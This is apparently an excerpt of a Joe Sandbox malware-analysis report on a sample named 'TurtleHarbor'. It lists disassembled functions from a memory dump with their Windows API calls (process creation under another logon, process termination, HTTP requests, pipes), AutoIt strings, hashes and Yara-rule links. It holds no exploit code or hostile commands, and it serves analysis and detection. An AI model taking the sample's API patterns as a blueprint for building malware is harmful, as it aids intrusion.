Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 4568beac13b3d6852a3f79cd42f94a1df2d1fa99c9141983c3f0cd7d5335fc86
Instruction ID: b80862f1b8d0784b3ea14d4e5729602f552fd1c7d96b0361e4287d6033411797
Opcode Fuzzy Hash: 4568beac13b3d6852a3f79cd42f94a1df2d1fa99c9141983c3f0cd7d5335fc86
Instruction Fuzzy Hash: 6611DC32601204EFDB17CFA5CC09BAE7BBDEF46322F10C01AE84197218CB36A901CB60

Function 003691CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00369200
OpenProcessToken.ADVAPI32(00000000), ref: 00369207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00369216
CloseHandle.KERNEL32(00000004), ref: 00369221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00369250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00369264

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0367b468991a3f5ebee2c09318c1f471dc019d6d7fc4ce42c4138c1949a6c1ef
Instruction ID: 118c764b5bd5319e4872ea0f038704e175b8b65d0750c889ce507054a5ee6d99
Opcode Fuzzy Hash: 0367b468991a3f5ebee2c09318c1f471dc019d6d7fc4ce42c4138c1949a6c1ef
Instruction Fuzzy Hash: CC11477250120EABDF028FA4ED49BDA7BADEB49304F158015FA04A2160C2769D60EB60

Function 0036C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0036C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 0036C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0036C366
ReleaseDC.USER32(00000000,00000000), ref: 0036C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0036C385
MulDiv.KERNEL32(000009EC,?,?), ref: 0036C397

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 138a10f35338e86402b1fac73557b2cbd903e78922949b213549eb3df6a22e91
Instruction ID: 0117c63c6a140973d5cb7bcc550de13870226bc7a6339581da31679072d36923
Opcode Fuzzy Hash: 138a10f35338e86402b1fac73557b2cbd903e78922949b213549eb3df6a22e91
Instruction Fuzzy Hash: AC018475E00208BBEF159BA59C49A5EBFBCEB49311F008065FA08AB290D6349C10CFA0

Function 0039C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 003116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00311729
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311738
Part of subcall function 003116CF: BeginPath.GDI32(?), ref: 0031174F
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0039C57C
LineTo.GDI32(00000000,00000003,?), ref: 0039C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0039C59E
LineTo.GDI32(00000000,00000000,?), ref: 0039C5AE
EndPath.GDI32(00000000), ref: 0039C5BE
StrokePath.GDI32(00000000), ref: 0039C5CE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 01117d81b6bc5b7de44e1800d65805a65e5e1ea495591b9859e0723a9d209382
Instruction ID: 3ec4f26f9987c066656ec1b6cdeb2204f999f9aa2e88221b10738c5d07bc8bf0
Opcode Fuzzy Hash: 01117d81b6bc5b7de44e1800d65805a65e5e1ea495591b9859e0723a9d209382
Instruction Fuzzy Hash: B111DB7600010DBFDF139F91DC88FEA7FADEB09354F058052BA195A160D771AE55DBA0

Function 003307BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 003307EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 003307F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003307FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0033080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00330812
MapVirtualKeyW.USER32(00000012,00000000), ref: 0033081A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: cf89365d8b0e76d9c7fa839002179778ff65c669047fd2fe23a5e34ea88ab6c2
Instruction ID: 8e881fc438169c48b88a6cbd457bcfc02ce97e4c0e1ffab2f3a3ed055c065dae
Opcode Fuzzy Hash: cf89365d8b0e76d9c7fa839002179778ff65c669047fd2fe23a5e34ea88ab6c2
Instruction Fuzzy Hash: 11016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5

Function 003759A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003759B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003759CA
GetWindowThreadProcessId.USER32(?,?), ref: 003759D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003759E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003759F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003759F9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: e10005de71018bbd6cb2788cd5be5d5bc96de979e03be328c77b6c6c3c5196ad
Instruction ID: 6734f42a2740c228310b8a14fa1c96995f092dd7f7d4194d42cf82ba69d228c5
Opcode Fuzzy Hash: e10005de71018bbd6cb2788cd5be5d5bc96de979e03be328c77b6c6c3c5196ad
Instruction Fuzzy Hash: 6DF03036241158BFE7265B929C0DEEF7B7CEFC7B15F000159FA05D1060E7A41A1286B5

Function 003777EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 003777FE
EnterCriticalSection.KERNEL32(?,?,0031C2B6,?,?), ref: 0037780F
TerminateThread.KERNEL32(00000000,000001F6,?,0031C2B6,?,?), ref: 0037781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,0031C2B6,?,?), ref: 00377829

Part of subcall function 003771F0: CloseHandle.KERNEL32(00000000,?,00377836,?,0031C2B6,?,?), ref: 003771FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 0037783C
LeaveCriticalSection.KERNEL32(?,?,0031C2B6,?,?), ref: 00377843

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 59078ba4a991e43dc665bbccd0caa91088fe31052032b2d31e8c7bc540291239
Instruction ID: 7cf533d84401b605d1666eef8998cde7ae8733380b74449389deee792a709d76
Opcode Fuzzy Hash: 59078ba4a991e43dc665bbccd0caa91088fe31052032b2d31e8c7bc540291239
Instruction Fuzzy Hash: 33F05E36145312ABD7272B64EC8DAEF773DFF46302F154821F102950A1CBB95801CB61

Function 0036954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00369555
UnloadUserProfile.USERENV(?,?), ref: 00369561
CloseHandle.KERNEL32(?), ref: 0036956A
CloseHandle.KERNEL32(?), ref: 00369572
GetProcessHeap.KERNEL32(00000000,?), ref: 0036957B
HeapFree.KERNEL32(00000000), ref: 00369582

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fdb0b7ef5eb672980e40c4fecaba9ea31d0cd235ea3f0c45c4af92b190e17cf3
Instruction ID: dcade1dae0e5117c187450c8b3125d832f85bc7e7442186de3a314003ad0caae
Opcode Fuzzy Hash: fdb0b7ef5eb672980e40c4fecaba9ea31d0cd235ea3f0c45c4af92b190e17cf3
Instruction Fuzzy Hash: 0EE0C23A104101BFDA061BE1EC0C99ABB2DFB4A722F104220F215810B0CB72A461DF50

Function 00388CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00388CFD
CharUpperBuffW.USER32(?,?), ref: 00388E0C
VariantClear.OLEAUT32(?), ref: 00388F84

Part of subcall function 00377B1D: VariantInit.OLEAUT32(00000000), ref: 00377B5D
Part of subcall function 00377B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00377B66
Part of subcall function 00377B1D: VariantClear.OLEAUT32(00000000), ref: 00377B72

Strings

Incorrect Parameter format, xrefs: 00388D35, 00388EF7
AUTOIT.ERROR, xrefs: 00388E12

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: edb21aa405dd4ab7fc02ce88b95273e87851d4fdeefee5c727bacb16f3589508
Instruction ID: eec7bf6b86a2c5ea2f9e8f329697f314774a7e2b7a2440a524745ab7a7ce7ca2
Opcode Fuzzy Hash: edb21aa405dd4ab7fc02ce88b95273e87851d4fdeefee5c727bacb16f3589508
Instruction Fuzzy Hash: 9F919F746083019FC715EF24C48095ABBF5EF99314F14895EF88A8B362DB31ED45CB51

Function 0037323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

_memset.LIBCMT ref: 0037332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0037335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00373410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0037343E

Strings

0, xrefs: 0037331A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: f778b35271cf485bfbadb773e32294c8afff4e4564316057d0eb08eed36c8f43
Instruction ID: 22ab645c1674dc1dabbd1b096dea789d78e0f1d35556efb387da1591491b3814
Opcode Fuzzy Hash: f778b35271cf485bfbadb773e32294c8afff4e4564316057d0eb08eed36c8f43
Instruction Fuzzy Hash: 3B51CF316083019BD73BDE29D84566BBBE8AF45310F058A2EF899D72D1DB38CE44E752

Function 0039DF09 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00388A0E,?,00000000), ref: 0039DF71
SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00388A0E,?,00000000,00000000), ref: 0039DFA7
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0039DFB8
SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00388A0E,?,00000000,00000000), ref: 0039E03A

Strings

DllGetClassObject, xrefs: 0039DFAD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f1b00f36fbfc2928778692ef5139b751147c2d943dcc2bd2f1f37f209129c5b6
Instruction ID: 106af62edd3492f6e6f33b2f0a0564acc8193dee05a425d580dd0c71109cdb35
Opcode Fuzzy Hash: f1b00f36fbfc2928778692ef5139b751147c2d943dcc2bd2f1f37f209129c5b6
Instruction Fuzzy Hash: 85416D76600205EFDF16CF56C884BAA7BA9EF44710F1480AAE9099F205E7F5DD44CBA0

Function 00372EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00372F67
GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00372F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00372FC9
DeleteMenu.USER32(?,?,00000000,?,00000000,00000000,003D7890,00000000), ref: 00373012

Strings

0, xrefs: 00372F5C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 5f1461a9b5a77944eb70263b60fb55fa5a2443a13e61348ea62902b8b7583cb3
Instruction ID: df522c9c26936340b8e36cf8d248ab7dd1b8d5995425d98adbfef12d1661023b
Opcode Fuzzy Hash: 5f1461a9b5a77944eb70263b60fb55fa5a2443a13e61348ea62902b8b7583cb3
Instruction Fuzzy Hash: 7241C3312083419FD736DF24C884B5BBBE8BF89310F118A1DF46A9B291D774EA05CB52

Function 0038DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038DEAE

Part of subcall function 00321462: _memmove.LIBCMT ref: 003214B0

Strings

winapi, xrefs: 0038DF1F
cdecl, xrefs: 0038DF05
stdcall, xrefs: 0038DF30
none, xrefs: 0038DF89

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: f0b337c5982991a8ff82a2aed5aa28c5e6e8a8f0337b0c5244ebd2b6c932174b
Instruction ID: 9e636c768bcfc3d484138b61cf099100b15a2486509d43e147ac9ccb2b5da62e
Opcode Fuzzy Hash: f0b337c5982991a8ff82a2aed5aa28c5e6e8a8f0337b0c5244ebd2b6c932174b
Instruction Fuzzy Hash: 5531B074900229AFCF06EF54D9419EEB3B4FF15324B108669F9269B6D1DB31AD05CB80

Function 00369A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00369ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00369ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00369B0F

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Strings

ListBox, xrefs: 00369A8B
ComboBox, xrefs: 00369A56

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: e5ad5df60cabb3d03d2ea9440d444c3992469bde3b54709941294dc95de5c201
Instruction ID: dcbc455cab852d0704ddfccf01d22af97b7f6f7d785a629da73f03d4192dd205
Opcode Fuzzy Hash: e5ad5df60cabb3d03d2ea9440d444c3992469bde3b54709941294dc95de5c201
Instruction Fuzzy Hash: AE213571900104BEDB1AEBA4EC86EFFB7BCDF56360F14811AF8219B2E4DB340D098660

Function 00381EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00381F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00381F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00381F6E
InternetCloseHandle.WININET(00000000), ref: 00381FB5

Part of subcall function 00382B4F: GetLastError.KERNEL32(?,?,00381EE3,00000000,00000000,00000001), ref: 00382B64
Part of subcall function 00382B4F: SetEvent.KERNEL32(?,?,00381EE3,00000000,00000000,00000001), ref: 00382B79

Strings

, xrefs: 00381F5F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: c9aa425c18dc371e9d0f3b63c0faf1c9a8c5e9600e6683183b3932f313052697
Instruction ID: 3e73f2e35801677208415e310d27025d2c02ec37d1fdde4c0243a0a44a2cc3a0
Opcode Fuzzy Hash: c9aa425c18dc371e9d0f3b63c0faf1c9a8c5e9600e6683183b3932f313052697
Instruction Fuzzy Hash: 12218EB1604308BEE713AF608C85EBF76ADEB49B94F10425AF505A6240DB359D069BA1

Function 00396A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00312111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
Part of subcall function 00312111: GetStockObject.GDI32(00000011), ref: 00312163
Part of subcall function 00312111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00396A86
LoadLibraryW.KERNEL32(?), ref: 00396A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00396AA2
DestroyWindow.USER32(?), ref: 00396AAA

Strings

SysAnimate32, xrefs: 00396A61

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: ad4e3edacacaa1da1f785381609e9170ab98406aeed17344c95d141ff6785a5a
Instruction ID: c4ae37a3f2f97ac5658ee5aa009770881dc9a6885c12f0b6643186682f239d5d
Opcode Fuzzy Hash: ad4e3edacacaa1da1f785381609e9170ab98406aeed17344c95d141ff6785a5a
Instruction Fuzzy Hash: 7321DEB1211206AFEF128F74DC82EBB37ACEF59364F118619FA10A6090D331CC50A760

Function 00377357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00377377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003773AA
GetStdHandle.KERNEL32(0000000C), ref: 003773BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003773F6

Strings

nul, xrefs: 003773F1

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

